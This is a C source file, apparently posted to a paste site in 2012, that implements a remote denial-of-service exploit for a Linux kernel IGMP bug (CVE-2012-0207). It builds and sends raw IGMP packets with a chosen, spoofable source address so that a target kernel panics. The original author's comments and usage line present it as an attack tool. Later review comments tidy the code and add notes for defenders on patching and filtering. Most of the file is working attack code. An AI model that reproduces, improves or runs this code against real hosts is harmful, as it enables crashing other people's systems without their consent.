
fuckfd.c

a guest
Jan 18th, 2012
  1. /*
  2. ** linux-undeadattack.c
  3. ** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
  4. ** CVE-2012-0207
  5. ** credits to Ben Hutchings:
  6. ** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
  7. ** THIS code, which can attack NOT just LAN, is NOT kcope's and is based more on the IGMPv3 membership query bug... which was for windows but also affects linux, in IGMPv3 tho :P go figure... anyhow, this can now be easily made into a very fast packet machine, and since it doesn't care what the ips are, i guess results could be seen remotely... feel free to update/send in comment... all comments go through ME, XD, before any type of publishing, so be sure that codes are safe, and i only put corrected codes here... simple... so, please don't go adding it to your lame d0s collection coz i'll just fark it up, and, i mean, the packet is easy to block since it is released... right
  8. ** Example:
  9. ** ./undeadattack SRC_IP DST_IP
  10. ** The Linux Kernel at the remote side will Panic
  11. ** when sent over the network -still in testing!
  12. */
  13. #include <stdio.h>
  14. #include <string.h>
  15. #include <stdlib.h>
  16. #include <netinet/in.h>
  17. #include <netdb.h>
  18. #include <sys/time.h>
  19. #include <sys/types.h>
  20. #include <sys/socket.h>
  21. #include <arpa/inet.h>
  22. #include <unistd.h>
  23.  
  /*
   * Hand-declared IPv4 header with room for two 32-bit option words after the
   * fixed fields.  With 1/2/4-byte char/short/int this is 28 bytes, i.e. seven
   * 32-bit words, rather than the 20-byte option-less header.
   *
   * NOTE(review): ihl is declared before version, which presumably relies on
   * the compiler allocating bit-fields from the low-order bits of the first
   * byte (as GCC does on little-endian targets) - confirm before building for
   * another ABI.
   */
  struct iphdr {
    unsigned char  ihl:4;      /* header length, in 32-bit words */
    unsigned char  version:4;  /* IP version number */
    unsigned char  tos;
    unsigned short tot_len;    /* total packet length */
    unsigned short id;
    unsigned short frag_off;
    unsigned char  ttl;
    unsigned char  protocol;
    unsigned short check;      /* header checksum */
    unsigned int   saddr;      /* source address */
    unsigned int   daddr;      /* destination address */
    unsigned int   options1;   /* first 32-bit word of IP option space */
    unsigned int   options2;   /* second 32-bit word of IP option space */
  };
  33.  
  /*
   * IGMP query message as laid out in the packet buffer: a 1-byte type, a
   * 1-byte max-response field, a 16-bit checksum and a 32-bit group address,
   * followed by 40 bytes of spare space.  main() transmits only the first 8 or
   * 12 bytes of this structure.
   */
  struct igmp_query {
    unsigned char  type;         /* IGMP message type */
    unsigned char  maxresponse;  /* max response field */
    unsigned short csum;         /* checksum over the IGMP message */
    unsigned int   mcast;        /* group address */
    char           padding[40];  /* trailing bytes; left zero by main() */
  };
  41.  
  42. // unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work
  43.  
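  /*
   * in_chksum - 16-bit ones'-complement checksum over len bytes at addr.
   *
   * addr: start of the data; it is read byte-wise, so it need not be aligned
   *       for unsigned short even though the parameter type says so.
   * len:  number of bytes to cover; a value <= 0 covers nothing and the
   *       function returns 0xffff.
   *
   * Returns the complement of the folded sum of the data taken as host-order
   * 16-bit words.  An odd trailing byte is placed in the first byte (in memory
   * order) of a zeroed 16-bit word before it is added.
   *
   * The accumulator is an unsigned 64-bit-or-wider type and carries are folded
   * until none remain.  The earlier version summed into a signed int, which
   * overflows (undefined behaviour) once the data exceeds roughly 64 KiB of
   * 0xffff words, and read the buffer through an unsigned short pointer even
   * when the caller passed a char array.
   */
  unsigned short in_chksum(unsigned short *addr, int len);

  unsigned short in_chksum(unsigned short *addr, int len) {
     const unsigned char *p = (const unsigned char *)addr;
     unsigned long long sum = 0;
     int nleft = len;

     while (nleft > 1) {
        unsigned short word;

        /* memcpy avoids misaligned and type-punned loads from the buffer */
        memcpy(&word, p, sizeof word);
        sum += word;
        p += sizeof word;
        nleft -= 2;
     }

     if (nleft == 1) {
        unsigned short tail = 0;

        /* the odd byte occupies the first byte of an otherwise zero word */
        memcpy(&tail, p, 1);
        sum += tail;
     }

     /* fold every carry out of the low 16 bits back in (end-around carry) */
     while (sum >> 16) {
        sum = (sum & 0xffff) + (sum >> 16);
     }

     return (unsigned short)~sum;
  }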
  63.  
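  /*
   * resolve - look up host with gethostbyname() and return its first IPv4
   * address.
   *
   * host: host name or dotted-quad string.
   *
   * Returns the 32-bit address in network byte order, zero-extended into a
   * long, or -1 if host is NULL, the lookup fails, or the answer is not a
   * 4-byte AF_INET address.
   *
   * The earlier version copied h_length bytes into an uninitialised long, so
   * the bytes of the long not covered by the copy were indeterminate and a
   * longer-than-expected h_length would have written past the variable.  The
   * copy is now bounded to a 4-byte temporary.
   *
   * NOTE(review): where long is 32 bits, 255.255.255.255 is indistinguishable
   * from the -1 error value; callers that care must check separately.
   */
  long resolve(char *);

  long resolve(char *host) {
    struct hostent *hst;
    in_addr_t v4 = 0;

    if (host == NULL)
      return(-1);

    hst = gethostbyname(host);
    if (hst == NULL)
      return(-1);

    /* accept only a well-formed IPv4 answer before copying from it */
    if (hst->h_addrtype != AF_INET ||
        hst->h_length != (int)sizeof v4 ||
        hst->h_addr_list == NULL ||
        hst->h_addr_list[0] == NULL)
      return(-1);

    memcpy(&v4, hst->h_addr_list[0], sizeof v4);
    return((long)v4);
  }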
  74.  
  /*
   * Proof-of-concept for CVE-2012-0207 (see the file header): builds one raw
   * IPv4 packet in buf and sends it twice to the argv[2] address, first as an
   * 8-byte IGMP message of type 0x11 with max response 0xff, then as a 12-byte
   * message of the same type with max response 0.
   *
   * argv[1] becomes the packet's source address and argv[2] its destination;
   * both are passed through resolve().  Returns 1 on a usage error or when a
   * raw socket cannot be created, exits with -1 when sendto() fails, and
   * returns 0 otherwise.
   *
   * For defenders: what reaches the wire is a pair of IGMP type-0x11 messages
   * from the same source, the second with a zero max-response field and a
   * 12-byte IGMP body.  Running a kernel that carries the fix for
   * CVE-2012-0207 removes the exposure, and IGMP from sources outside the
   * local segment can be dropped at the network edge.
   * NOTE(review): the statement that the zero max-response value is what the
   * affected kernel mishandles comes from the advisory linked in the file
   * header, not from anything this code shows - confirm there.
   */
  int main(int argc, char *argv[]) {
    struct sockaddr_in dst;
    struct iphdr *ip;
    struct igmp_query *igmp;
    long daddr, saddr;
    int s, i=0, c, len, one=1; /* i, c, len and one are never used below */
    char buf[1500];
    /* Both a source and a destination argument are required. */
    if (argc < 3) {
     printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
    "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
     printf("Usage: %s <src ip> <dst ip>\n", *argv); // *argv is the program name
      return(1);
    }
    /* NOTE(review): resolve() returns -1 on failure and that is not checked
     * here; the value would be stored as an address as-is. */
    daddr = resolve(argv[2]);
    saddr = resolve(argv[1]);
    memset(buf, 0, 1500);
    /* The IP header overlays the start of buf and the IGMP message starts
     * immediately after sizeof(struct iphdr) bytes. */
    ip = (struct iphdr *)&buf;
    igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
    dst.sin_addr.s_addr = daddr;
    dst.sin_family = AF_INET;
    /* 7 words of 4 bytes = 28 bytes: the fixed header fields plus the two
     * option words declared in struct iphdr (left zero below). */
    ip->ihl = 7;
    ip->version = 4;
    ip->tos = 0;
    /* First packet: header plus an 8-byte IGMP message. */
    ip->tot_len = htons(sizeof(struct iphdr)+8);
    ip->id = htons(18277);
    ip->frag_off=0;
    ip->ttl = 1;
    ip->protocol = IPPROTO_IGMP;
    /* Checksum of the header bytes as they stand at this point. */
    ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
    ip->saddr = saddr;
    ip->daddr = daddr;
    ip->options1 = 0;
    ip->options2 = 0;
    igmp->type = 0x11;
    igmp->maxresponse = 0xff;
    igmp->mcast=inet_addr("0.0.0.0"); // group address field is all zeroes
    /* The checksum field must be zero while the checksum is computed. */
    igmp->csum = 0;
    igmp->csum=in_chksum((unsigned short *)igmp, 8);
    /* Raw socket on which the caller supplies the whole packet, IP header
     * included; creating it requires root, as the original author notes. */
    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s == -1)
    return(1); /* fails silently: no message is printed */
    printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
    if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
   perror("Error sending");
    exit(-1);
    }
    close(s);
    /* A fresh raw socket is opened for the second packet. */
    s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (s == -1)
    return(1);
    /* Second packet reuses buf; only the id, total length, max-response
     * field and IGMP checksum are rewritten. */
    ip->id = htons(18278);
    ip->tot_len = sizeof(struct iphdr)+12;
    igmp->type = 0x11;
    igmp->maxresponse = 0;
    igmp->mcast=inet_addr("0.0.0.0");
    igmp->csum = 0;
    /* 12 bytes this time: the extra 4 are the first bytes of padding[],
     * which are still zero from the memset above. */
    igmp->csum=in_chksum((unsigned short *)igmp, 12);
    printf("Sending: %s -> %s\n", argv[1], argv[2]);
    if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
         perror("Error sending");
          exit(-1);
        }
    /* s is not closed on this path. */
    return(0);
  }